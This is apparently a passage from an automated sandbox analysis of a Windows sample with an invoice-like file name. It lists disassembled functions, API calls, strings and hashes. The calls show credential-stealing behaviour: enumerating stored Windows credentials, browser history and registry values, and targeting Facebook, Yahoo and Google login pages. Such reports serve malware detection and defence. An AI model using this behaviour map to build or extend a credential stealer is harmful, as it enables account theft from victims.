                                                                                                                                                                                                                                          • CloseHandle.KERNEL32(00000000), ref: 0040E143
                                                                                                                                                                                                                                          • CloseHandle.KERNEL32(?), ref: 0040E148
                                                                                                                                                                                                                                          • CloseHandle.KERNEL32(?), ref: 0040E14D
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000002.00000002.3013608350.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3013608350.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3013608350.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: File$Handle$Close$CreateProcess$CurrentTempView$??2@DirectoryDuplicateInformationMappingNameOpenPathQuerySizeSystemUnmapWindowsWrite_wcsicmpmemset
                                                                                                                                                                                                                                          • String ID: bhv
                                                                                                                                                                                                                                          • API String ID: 4234240956-2689659898
                                                                                                                                                                                                                                          • Opcode ID: d6173e2fc1e4a9acd8e6e5097b502ef7bad012bb9f4f5ce7a241332e90e3d993
                                                                                                                                                                                                                                          • Instruction ID: 69536691d8562172d0558c987aea6dfe4ed17d6a9a6de0cf2c6621a9a97a0e87
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: d6173e2fc1e4a9acd8e6e5097b502ef7bad012bb9f4f5ce7a241332e90e3d993
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 15412775800218FBCF119FA6CC489DFBFB9FF09750F148466F504A6250D7748A50CBA8
                                                                                                                                                                                                                                          Function 00413F4F Relevance: 19.3, APIs: 5, Strings: 6, Instructions: 29libraryloaderCOMMON
                                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                          control_flow_graph 691 413f4f-413f52 692 413fa5 691->692 693 413f54-413f5a call 40a804 691->693 695 413f5f-413fa4 GetProcAddress * 5 693->695 695->692
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                            • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                                                                                                                                                                                                            • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(C:\Windows\system32,00000104), ref: 0040A841
                                                                                                                                                                                                                                            • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                                                                                                                                                                                                            • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                                                                                                                                                                                                            • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000), ref: 0040A87B
                                                                                                                                                                                                                                            • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?), ref: 0040A884
                                                                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,psapi.dll), ref: 00413F6F
                                                                                                                                                                                                                                          • GetProcAddress.KERNEL32(?,EnumProcessModules), ref: 00413F7B
                                                                                                                                                                                                                                          • GetProcAddress.KERNEL32(?,GetModuleFileNameExW), ref: 00413F87
                                                                                                                                                                                                                                          • GetProcAddress.KERNEL32(?,EnumProcesses), ref: 00413F93
                                                                                                                                                                                                                                          • GetProcAddress.KERNEL32(?,GetModuleInformation), ref: 00413F9F
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000002.00000002.3013608350.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3013608350.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3013608350.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: AddressProc$LibraryLoad$DirectorySystemmemsetwcscatwcscpy
                                                                                                                                                                                                                                          • String ID: EnumProcessModules$EnumProcesses$GetModuleBaseNameW$GetModuleFileNameExW$GetModuleInformation$psapi.dll
                                                                                                                                                                                                                                          • API String ID: 2941347001-70141382
                                                                                                                                                                                                                                          • Opcode ID: f3462473bc82ea1c51451d3a028beeb45a1422339b7559a3bc587941b48753d6
                                                                                                                                                                                                                                          • Instruction ID: 7b3d606b7d389a8205b465373562f67d85acf78e859b2fe1c5436fc88fb80995
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: f3462473bc82ea1c51451d3a028beeb45a1422339b7559a3bc587941b48753d6
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: BBF03470840340AECB706F769809E06BEF0EFD8B097318C2EE6C557291E3BD9098DE48
                                                                                                                                                                                                                                          Function 0040C274 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 112COMMON
                                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • memset.MSVCRT ref: 0040C298
                                                                                                                                                                                                                                            • Part of subcall function 00414C2E: SHGetSpecialFolderPathW.SHELL32(00000000,?,0000001A,00000000,?,00000000), ref: 00414C68
                                                                                                                                                                                                                                            • Part of subcall function 0040E5ED: memset.MSVCRT ref: 0040E60F
                                                                                                                                                                                                                                            • Part of subcall function 0040E5ED: memset.MSVCRT ref: 0040E629
                                                                                                                                                                                                                                            • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT(00000000,00000000,0040B608), ref: 0040AFD8
                                                                                                                                                                                                                                          • FindFirstUrlCacheEntryW.WININET(visited:,?,80000001), ref: 0040C30D
                                                                                                                                                                                                                                          • wcschr.MSVCRT ref: 0040C324
                                                                                                                                                                                                                                          • wcschr.MSVCRT ref: 0040C344
                                                                                                                                                                                                                                          • FindNextUrlCacheEntryW.WININET(?,?,80000001), ref: 0040C369
                                                                                                                                                                                                                                          • GetLastError.KERNEL32 ref: 0040C373
                                                                                                                                                                                                                                          • FindNextUrlCacheEntryW.WININET(?,?,80000001), ref: 0040C39F
                                                                                                                                                                                                                                          • FindCloseUrlCache.WININET(?), ref: 0040C3B0
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000002.00000002.3013608350.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3013608350.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3013608350.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: CacheFind$Entrymemset$Nextwcschr$??2@CloseErrorFirstFolderLastPathSpecial
                                                                                                                                                                                                                                          • String ID: visited:
                                                                                                                                                                                                                                          • API String ID: 2470578098-1702587658
                                                                                                                                                                                                                                          • Opcode ID: 93c9a51482be428e2f8f42027b6bca19130ab09787b58ace62cc7f2a9cf54466
                                                                                                                                                                                                                                          • Instruction ID: 6629d855392f08d41decd2a192e4b6579142cf3eaa95f33c860a05aa0b18639b
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 93c9a51482be428e2f8f42027b6bca19130ab09787b58ace62cc7f2a9cf54466
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: DA417F71D00219ABDB10EF92DC85AEFBBB8FF45714F10416AE904F7281D7389A45CBA9
                                                                                                                                                                                                                                          Function 0040E175 Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 91COMMON
                                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                          control_flow_graph 721 40e175-40e1a1 call 40695d call 406b90 726 40e1a7-40e1e5 memset 721->726 727 40e299-40e2a8 call 4069a3 721->727 729 40e1e8-40e1f3 call 406e8f 726->729 732 40e1f8-40e1fa 729->732 733 40e270-40e27d call 406b53 732->733 734 40e1fc-40e219 call 40dd50 * 2 732->734 733->729 739 40e283-40e286 733->739 734->733 745 40e21b-40e21d 734->745 742 40e291-40e294 call 40aa04 739->742 743 40e288-40e290 free 739->743 742->727 743->742 745->733 746 40e21f-40e235 call 40742e 745->746 746->733 749 40e237-40e242 call 40aae3 746->749 749->733 752 40e244-40e26b _snwprintf call 40a8d0 749->752 752->733
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                            • Part of subcall function 00406B90: _wcsicmp.MSVCRT ref: 00406BC1
                                                                                                                                                                                                                                          • memset.MSVCRT ref: 0040E1BD
                                                                                                                                                                                                                                            • Part of subcall function 00406E8F: memset.MSVCRT ref: 00406F8B
                                                                                                                                                                                                                                          • free.MSVCRT ref: 0040E28B
                                                                                                                                                                                                                                            • Part of subcall function 0040DD50: _wcsicmp.MSVCRT ref: 0040DD69
                                                                                                                                                                                                                                            • Part of subcall function 0040AAE3: wcslen.MSVCRT ref: 0040AAF2
                                                                                                                                                                                                                                            • Part of subcall function 0040AAE3: _memicmp.MSVCRT ref: 0040AB20
                                                                                                                                                                                                                                          • _snwprintf.MSVCRT ref: 0040E257
                                                                                                                                                                                                                                            • Part of subcall function 0040A8D0: wcslen.MSVCRT ref: 0040A8E2
                                                                                                                                                                                                                                            • Part of subcall function 0040A8D0: free.MSVCRT ref: 0040A908
                                                                                                                                                                                                                                            • Part of subcall function 0040A8D0: free.MSVCRT ref: 0040A92B
                                                                                                                                                                                                                                            • Part of subcall function 0040A8D0: memcpy.MSVCRT(?,?,000000FF,00000001,?,00000000,?,?,0040AD76,?,000000FF), ref: 0040A94F
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000002.00000002.3013608350.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3013608350.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3013608350.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: free$_wcsicmpmemsetwcslen$_memicmp_snwprintfmemcpy
                                                                                                                                                                                                                                          • String ID: $ContainerId$Container_%I64d$Containers$Name
                                                                                                                                                                                                                                          • API String ID: 2804212203-2982631422
                                                                                                                                                                                                                                          • Opcode ID: 7a95fccbd23525aa76b2e079fc64e0475dfff11d865135f876cd6a5397388c2b
                                                                                                                                                                                                                                          • Instruction ID: de93d03617a61f3aa6bbe184beafcfad76b4f566d35596b706efacabd7485ccb
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 7a95fccbd23525aa76b2e079fc64e0475dfff11d865135f876cd6a5397388c2b
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 74318272D002196ADF10EFA6DC45ADEB7B8AF04344F1105BFE508B3191DB38AE598F99
                                                                                                                                                                                                                                          Function 0040BDB0 Relevance: 13.7, APIs: 9, Instructions: 151COMMON
                                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                          control_flow_graph 770 40bdb0-40bdce call 404363 773 40bf63-40bf6f call 40440c 770->773 774 40bdd4-40bddd 770->774 775 40bdee 774->775 776 40bddf-40bdec CredEnumerateW 774->776 778 40bdf0-40bdf2 775->778 776->778 778->773 780 40bdf8-40be18 call 40b2cc wcslen 778->780 783 40bf5d-40bf60 LocalFree 780->783 784 40be1e-40be20 780->784 783->773 784->783 785 40be26-40be42 wcsncmp 784->785 786 40be48-40be77 call 40bd5d call 404423 785->786 787 40bf4e-40bf57 785->787 786->787 792 40be7d-40bea3 memset 786->792 787->783 787->784 793 40bea5 792->793 794 40bea7-40beea memcpy 792->794 793->794 795 40bf11-40bf2d wcschr 794->795 796 40beec-40bf06 call 40b2cc _wcsnicmp 794->796 798 40bf38-40bf48 LocalFree 795->798 799 40bf2f-40bf35 795->799 796->795 801 40bf08-40bf0e 796->801 798->787 799->798 801->795
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                            • Part of subcall function 00404363: GetProcAddress.KERNEL32(?,00000000), ref: 00404398
                                                                                                                                                                                                                                            • Part of subcall function 00404363: GetProcAddress.KERNEL32(?,00000000), ref: 004043AC
                                                                                                                                                                                                                                            • Part of subcall function 00404363: GetProcAddress.KERNEL32(?,00000000), ref: 004043BF
                                                                                                                                                                                                                                            • Part of subcall function 00404363: GetProcAddress.KERNEL32(?,00000000), ref: 004043D3
                                                                                                                                                                                                                                            • Part of subcall function 00404363: GetProcAddress.KERNEL32(?,00000000), ref: 004043E7
                                                                                                                                                                                                                                          • CredEnumerateW.ADVAPI32(00000000,00000000,?,?,?,00000000,?), ref: 0040BDE9
                                                                                                                                                                                                                                          • wcslen.MSVCRT ref: 0040BE06
                                                                                                                                                                                                                                          • wcsncmp.MSVCRT ref: 0040BE38
                                                                                                                                                                                                                                          • memset.MSVCRT ref: 0040BE91
                                                                                                                                                                                                                                          • memcpy.MSVCRT(?,?,?,00000001,?,?,?,00000000,?), ref: 0040BEB2
                                                                                                                                                                                                                                          • _wcsnicmp.MSVCRT ref: 0040BEFC
                                                                                                                                                                                                                                          • wcschr.MSVCRT ref: 0040BF24
                                                                                                                                                                                                                                          • LocalFree.KERNEL32(?,?,?,?,00000001,?,?,?,00000000,?), ref: 0040BF48
                                                                                                                                                                                                                                          • LocalFree.KERNELBASE(?,00000214,?,00000000,?), ref: 0040BF60
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000002.00000002.3013608350.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3013608350.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3013608350.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: AddressProc$FreeLocal$CredEnumerate_wcsnicmpmemcpymemsetwcschrwcslenwcsncmp
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 1564206659-0
                                                                                                                                                                                                                                          • Opcode ID: 33cbc3fbfef4114ffc04ab79ab4e472c1ca1484598d0cfc67a802b423a316e07
                                                                                                                                                                                                                                          • Instruction ID: 79a9ca8399314c5bcb3e205da5602351372edcdcc58f79068602210d8f55f42f
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 33cbc3fbfef4114ffc04ab79ab4e472c1ca1484598d0cfc67a802b423a316e07
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 1851E9B5D002099FCF20DFA5C8859AEBBF9FF48304F10452AE919F7251E734A9458F69
                                                                                                                                                                                                                                          Function 0040BB98 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 145COMMON
                                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                            • Part of subcall function 0040CC26: GetFileSize.KERNEL32(00000000,00000000,000003FF,?,00000000,0040B7D4,?,?,?,?,000003FF,?,?,?,00445FAE,?), ref: 0040CC44
                                                                                                                                                                                                                                            • Part of subcall function 0040CC26: CloseHandle.KERNELBASE(?,?,000000FF,0000FDE9), ref: 0040CC98
                                                                                                                                                                                                                                            • Part of subcall function 0040CCF0: _wcsicmp.MSVCRT ref: 0040CD2A
                                                                                                                                                                                                                                          • memset.MSVCRT ref: 0040BC75
                                                                                                                                                                                                                                          • memset.MSVCRT ref: 0040BC8C
                                                                                                                                                                                                                                          • WideCharToMultiByte.KERNEL32(00000000,00000000,Function_0004E518,000000FF,?,00000FFF,00000000,00000000,?,?,?,0040B7D4,?,?), ref: 0040BCA8
                                                                                                                                                                                                                                          • memcmp.MSVCRT(?,00000000,00000005,?,?,?,0040B7D4,?,?,?,?,000003FF,?,?,?,00445FAE), ref: 0040BCD6
                                                                                                                                                                                                                                          • memcpy.MSVCRT(00000024,?,00000020,?,00000000,00000000,?,?,?,?,?,?,?,0040B7D4), ref: 0040BD2B
                                                                                                                                                                                                                                          • LocalFree.KERNEL32(?,?,00000000,00000000,?,?,?,?,?,?,?,0040B7D4), ref: 0040BD3D
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000002.00000002.3013608350.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3013608350.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3013608350.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: memset$ByteCharCloseFileFreeHandleLocalMultiSizeWide_wcsicmpmemcmpmemcpy
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 115830560-3916222277
                                                                                                                                                                                                                                          • Opcode ID: 4ebf604db45489440b0c8485e844b7deffc41ff7e568ae10611abfa3d316197e
                                                                                                                                                                                                                                          • Instruction ID: 00a8249a540342db609c93f8c1f67c79963b4134db5221072d0e6ece1bb2d715
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 4ebf604db45489440b0c8485e844b7deffc41ff7e568ae10611abfa3d316197e
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 3F41B372900219ABDB10ABA5CC85ADEB7ACEF04314F01057BB509F7292D7789E45CA99
                                                                                                                                                                                                                                          Function 0041837F Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 140fileCOMMON
                                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                          control_flow_graph 855 41837f-4183bf 856 4183c1-4183cc call 418197 855->856 857 4183dc-4183ec call 418160 855->857 862 4183d2-4183d8 856->862 863 418517-41851d 856->863 864 4183f6-41840b 857->864 865 4183ee-4183f1 857->865 862->857 866 418417-418423 864->866 867 41840d-418415 864->867 865->863 868 418427-418442 call 41739b 866->868 867->868 871 418444-41845d CreateFileW 868->871 872 41845f-418475 CreateFileA 868->872 873 418477-41847c 871->873 872->873 874 4184c2-4184c7 873->874 875 41847e-418495 GetLastError free 873->875 878 4184d5-418501 memset call 418758 874->878 879 4184c9-4184d3 874->879 876 4184b5-4184c0 call 444706 875->876 877 418497-4184b3 call 41837f 875->877 876->863 877->863 883 418506-418515 free 878->883 879->878 883->863
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • CreateFileW.KERNELBASE(?,-7FBE829D,00000003,00000000,?,?,00000000), ref: 00418457
                                                                                                                                                                                                                                          • CreateFileA.KERNEL32(?,-7FBE829D,00000003,00000000,|A,00417CE3,00000000), ref: 0041846F
                                                                                                                                                                                                                                          • GetLastError.KERNEL32 ref: 0041847E
                                                                                                                                                                                                                                          • free.MSVCRT ref: 0041848B
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000002.00000002.3013608350.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3013608350.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3013608350.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: CreateFile$ErrorLastfree
                                                                                                                                                                                                                                          • String ID: |A
                                                                                                                                                                                                                                          • API String ID: 77810686-1717621600
                                                                                                                                                                                                                                          • Opcode ID: b9220c8ee9235e77546fc7e578fe859ac5c7910c95b4d012992e052ab282d142
                                                                                                                                                                                                                                          • Instruction ID: 73005d91fce95ddd83c4435d1527c7398ec28b7193468e33704956b81d718a95
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: b9220c8ee9235e77546fc7e578fe859ac5c7910c95b4d012992e052ab282d142
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 50412472508306AFD710CF25DC4179BBBE5FF84328F14492EF8A492290EB78D9448B96
                                                                                                                                                                                                                                          Function 00412465 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 88windowCOMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • memset.MSVCRT ref: 0041249C
                                                                                                                                                                                                                                          • ??2@YAPAXI@Z.MSVCRT(00002A88), ref: 004124D2
                                                                                                                                                                                                                                          • ??2@YAPAXI@Z.MSVCRT(00000350), ref: 00412510
                                                                                                                                                                                                                                          • GetModuleHandleW.KERNEL32(00000000,0000000E), ref: 00412582
                                                                                                                                                                                                                                          • LoadIconW.USER32(00000000,00000065), ref: 0041258B
                                                                                                                                                                                                                                          • wcscpy.MSVCRT ref: 004125A0
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000002.00000002.3013608350.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3013608350.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3013608350.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: ??2@$HandleIconLoadModulememsetwcscpy
                                                                                                                                                                                                                                          • String ID: r!A
                                                                                                                                                                                                                                          • API String ID: 2791114272-628097481
                                                                                                                                                                                                                                          • Opcode ID: c924fcd7ecfcbdf661535418ab9e4f477d4ea067639620652b406838daccced0
                                                                                                                                                                                                                                          • Instruction ID: f2e108ad35b37ee9f58e8ef6409d1766b43f0b07df47584fb449e80907097569
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: c924fcd7ecfcbdf661535418ab9e4f477d4ea067639620652b406838daccced0
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 0431A1B19013889FEB30EF669C896CAB7E8FF44314F00852FE90CCB241DBB946548B49
                                                                                                                                                                                                                                          Function 0040C768 Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 87COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                            • Part of subcall function 0040B1AB: free.MSVCRT ref: 0040B1AE
                                                                                                                                                                                                                                            • Part of subcall function 0040B1AB: free.MSVCRT ref: 0040B1B6
                                                                                                                                                                                                                                            • Part of subcall function 0040AA04: free.MSVCRT ref: 0040AA0B
                                                                                                                                                                                                                                            • Part of subcall function 0040C274: memset.MSVCRT ref: 0040C298
                                                                                                                                                                                                                                            • Part of subcall function 0040C274: FindFirstUrlCacheEntryW.WININET(visited:,?,80000001), ref: 0040C30D
                                                                                                                                                                                                                                            • Part of subcall function 0040C274: wcschr.MSVCRT ref: 0040C324
                                                                                                                                                                                                                                            • Part of subcall function 0040C274: wcschr.MSVCRT ref: 0040C344
                                                                                                                                                                                                                                            • Part of subcall function 0040C274: FindNextUrlCacheEntryW.WININET(?,?,80000001), ref: 0040C369
                                                                                                                                                                                                                                            • Part of subcall function 0040C274: GetLastError.KERNEL32 ref: 0040C373
                                                                                                                                                                                                                                            • Part of subcall function 0040C3C3: memset.MSVCRT ref: 0040C439
                                                                                                                                                                                                                                            • Part of subcall function 0040C3C3: RegEnumValueW.ADVAPI32(?,00000000,?,000000FF,00000000,?,00000000,?,?,?,?,?,00000000,?), ref: 0040C467
                                                                                                                                                                                                                                            • Part of subcall function 0040C3C3: _wcsupr.MSVCRT ref: 0040C481
                                                                                                                                                                                                                                            • Part of subcall function 0040C3C3: memset.MSVCRT ref: 0040C4D0
                                                                                                                                                                                                                                            • Part of subcall function 0040C3C3: RegEnumValueW.ADVAPI32(?,00000000,?,000000FF,00000000,?,00000000,?,?,?,000000FF,?,?,?,?,00000000), ref: 0040C4FB
                                                                                                                                                                                                                                          • _wcslwr.MSVCRT ref: 0040C817
                                                                                                                                                                                                                                            • Part of subcall function 0040C634: wcslen.MSVCRT ref: 0040C65F
                                                                                                                                                                                                                                            • Part of subcall function 0040C634: memset.MSVCRT ref: 0040C6BF
                                                                                                                                                                                                                                          • wcslen.MSVCRT ref: 0040C82C
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000002.00000002.3013608350.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3013608350.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3013608350.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: memset$free$CacheEntryEnumFindValuewcschrwcslen$ErrorFirstLastNext_wcslwr_wcsupr
                                                                                                                                                                                                                                          • String ID: /$/$http://www.facebook.com/$https://login.yahoo.com/config/login$https://www.google.com/accounts/servicelogin
                                                                                                                                                                                                                                          • API String ID: 2936932814-4196376884
                                                                                                                                                                                                                                          • Opcode ID: b881829d82f0d8b9654aa99a04529af2f3c2152f6b010e5444e3d03ead400705
                                                                                                                                                                                                                                          • Instruction ID: 5b72bd72183a146cc5fb8da473a5bce975bbff0c760a192580a28ed18ba85502
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: b881829d82f0d8b9654aa99a04529af2f3c2152f6b010e5444e3d03ead400705
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 42218272A00244A6CF10BB6A9C8589E7B68EF44744B10457BB804B7293D67CDE85DB9D
                                                                                                                                                                                                                                          Function 0040A804 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 40libraryCOMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • memset.MSVCRT ref: 0040A824
                                                                                                                                                                                                                                          • GetSystemDirectoryW.KERNEL32(C:\Windows\system32,00000104), ref: 0040A841
                                                                                                                                                                                                                                          • wcscpy.MSVCRT ref: 0040A854
                                                                                                                                                                                                                                          • wcscat.MSVCRT ref: 0040A86A
                                                                                                                                                                                                                                          • LoadLibraryW.KERNELBASE(00000000), ref: 0040A87B
                                                                                                                                                                                                                                          • LoadLibraryW.KERNEL32(?), ref: 0040A884
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000002.00000002.3013608350.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3013608350.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3013608350.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
                                                                                                                                                                                                                                          Similarity
